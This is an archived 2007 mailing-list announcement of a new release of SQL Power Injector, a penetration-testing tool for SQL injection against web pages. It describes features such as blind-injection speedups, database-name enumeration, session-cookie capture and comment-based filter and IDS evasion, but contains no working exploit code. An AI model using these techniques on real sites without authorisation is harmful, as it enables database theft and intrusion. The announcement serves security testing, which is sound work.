From: Francois Larouche (francois.larouche-ml@sqlpowerinjector.com)
Date: Mon Jul 16 2007 - 14:08:51 EDT
Greeting list,
I have the pleasure to announce that a new version of SQL Power Injector
is now officially available on my web site:
www.sqlpowerinjector.com
This time like the last version I emphasized on maturity, stability and
reliability. I also emphasized on usability, documentation and innovation.
One of the major improvements is an innovative way to optimize and
accelerate the dichotomy in the Blind SQL injection, saving time/number
of requests up to 25%.
Added to this it's now possible to define a range list that will replace
a variable (<<@>>) inside a blind SQL injection string and automatically
play them for you. That means you can get all the database names from
the sysdatabases table in MS SQL without having to input the dbid each
time for example.
Also another great time saver is a new Firefox plugin that will launch
SQL Power Injector with all the information of the current webpage with
its session context. No more time wasted to copy paste the session
cookies after you logged... And of course you can make the easy SQL
tests in your browser and you use the plugin once you want to search
more thoroughly.
To make your life easier there is now a new feature that will search the
diff between a positive condition (1=1) response with a negative
condition (1=2) and display the list for you.
Last major addition is the extensive databases Help file (chm) that
contains most of the information you need when you SQL inject. It covers
the 5 DBMS supported by SQL Power Injector. You can find in it the
system tables and views with their columns, environment variables, the
useful functions and stored procedures. All this with some notes to how
to use them and why it's useful for SQL injection.
But of course, it's more than that... As you will see in the list of the
new features.
* Now support DB2 database
* Can create/edit ASCII characters preset in order to optimize the blind
SQL injection number of requests/speed
* Can make the blind SQL injection case insensitive (useful with
characters preset)
* New feature that will find the differences between the response page
of a positive answer with a negative one
* Created a Firefox Plugin that will launch SQL Power Injector with all
the current page context (string parameters and cookies)
* Created an extensive documentation used as a databases "Aide Memoire"
that contains information related to SQL injection for each supported
DBMS (System tables (with their column names and description),
environment and session variables, functions, dangerous stored procs,
etc...)
* Can create a range list that will replace the variable (<<@>>) inside
a blind SQL injection string and automatically play them for you
* Automatic replaying a variable range with a predefined list from a
text file
* New management console for Cookies used for the Load Page process
* Detect and add Cookies used during the Load Page process (Set-Cookie
detection)
* Improved the User Interface to display contextual information (normal
vs blind mode)
* New Datagrid has been added with the Cookies information, which can be
injected in the same fashion than the String Parameter
* Improved the accuracy and reliability of the blind SQL injection
results (if a character cannot be found it's replaced by the sun char (¤))
* Can edit the Referer
* View source now displays HTML in colors and can be customized in a XML
file
* Can search in the View source
* Can choose an User-Agent from the menu (and even add new ones in the
XML file)
* Threads are better managed and it's now possible to raise it to the
number you wish (50 max in the application but can be changed in the
source code)
* Can configure the application settings
* Support configurable proxies
* With SQL Server it is possible to use the TOP keyword
* Take in account the different syntax of MySQL 4.1.0 and lower with
higher versions in the database list
* Various things redesigned and quality improvement
* Two integrated tools: Hex and Char encoder and MS SQL @options
interpreter
* Problems when there is a Form tag inside another one (Bug fix)
* Bug with multi threads with cookies (Bug fix)
For those who don't know what is SQL Power Injector you will find next
some details about the application (more details can be found on the web
site):
INTRODUCTION
=============
SQL Power Injector is a graphical application created in .Net 1.1 that
helps the penetrating tester to inject SQL commands on a web page.
For now it is SQL Server, Oracle and MySQL compliant, but it is possible
to use it with any existing DBMS when using the inline injection (Normal
mode).
Moreover this application will get all the parameters you need to test
the SQL injection, either by GET or POST method, avoiding thus the need
to use several applications or a proxy to intercept the data.
FEATURES
=======
* Supported on Windows, Unix and Linux operating systems
* SQL Server, Oracle, MySQL, Sybase/Adaptive Server and DB2 compliant
* SSL support
* Load automatically the parameters from a form or a IFrame on a web
page (GET or POST)
* Detect and browse the framesets
* Option that auto detects the language of the web site
* Detect and add cookies used during the Load Page process (Set-Cookie
detection)
* Find automatically the submit page(s) with its method (GET or POST)
displayed in a different color
* Can create/modify/delete loaded string and cookies parameters directly
in the Datagrids
* Single SQL injection
* Blind SQL injection
- Comparison of true and false response of the page or results in the
cookie
- Time delay
* Response of the SQL injection in a customized browser
* Can view the HTML code source of the returned page in HTML contextual
colors and search in it
* Fine tuning parameters and cookies injection
* Can parameterize the size of the length and count of the expected
result to optimize the time taken by the application to execute the SQL
injection
* Create/edit ASCII characters preset in order to optimize the blind SQL
injection number of requests/speed
* Multithreading (configurable up to 50)
* Option to replace space by empty comments /**/ against IDS or filter
detection
* Automatically encode special characters before sending them
* Automatically detect predefined SQL errors in the response page
* Automatically detect a predefined word or sentence in the response page
* Real time result
* Save and load sessions in a XML file
* Feature that automatically finds the differences between the response
page of a positive answer with a negative one
* Can create a range list that will replace the variable (<<@>>) inside
a blind SQL injection string and automatically play them for you
* Automatic replaying a variable range with a predefined list from a
text file
* Firefox plugin that will launch SQL Power Injector with all the
information of the current webpage with its session context (parameters
and cookies)
* Two integrated tools: Hex and Char encoder and MS SQL @options
interpreter
* Can edit the Referer
* Can choose a User-Agent (or even create one in the User-Agent XML file)
* Can configure the application with the settings window
* Support configurable proxies
SUMMARY OF THE DIFFERENCES WITH THE OTHER EXISTING TOOLS
========================================================
* Web page string and cookie parameters auto detection
* Fine tuning parameters SQL injection
* Time delay feature
* Multithread feature
* Response results in a customized browser
* Automated positive and negative condition discovery
* Blind SQL injection characters preset optimizer
LICENSE
=======
Clarified Artistic License
Cheers!
Francois Larouche
------------------------------------------------------------------------
This List Sponsored by: Cenzic
Swap Out your SPI or Watchfire app sec solution for
Cenzic's robust, accurate risk assessment and management
solution FREE - limited Time Offer
http://www.cenzic.com/c/wf-spi
------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:57:56 EDT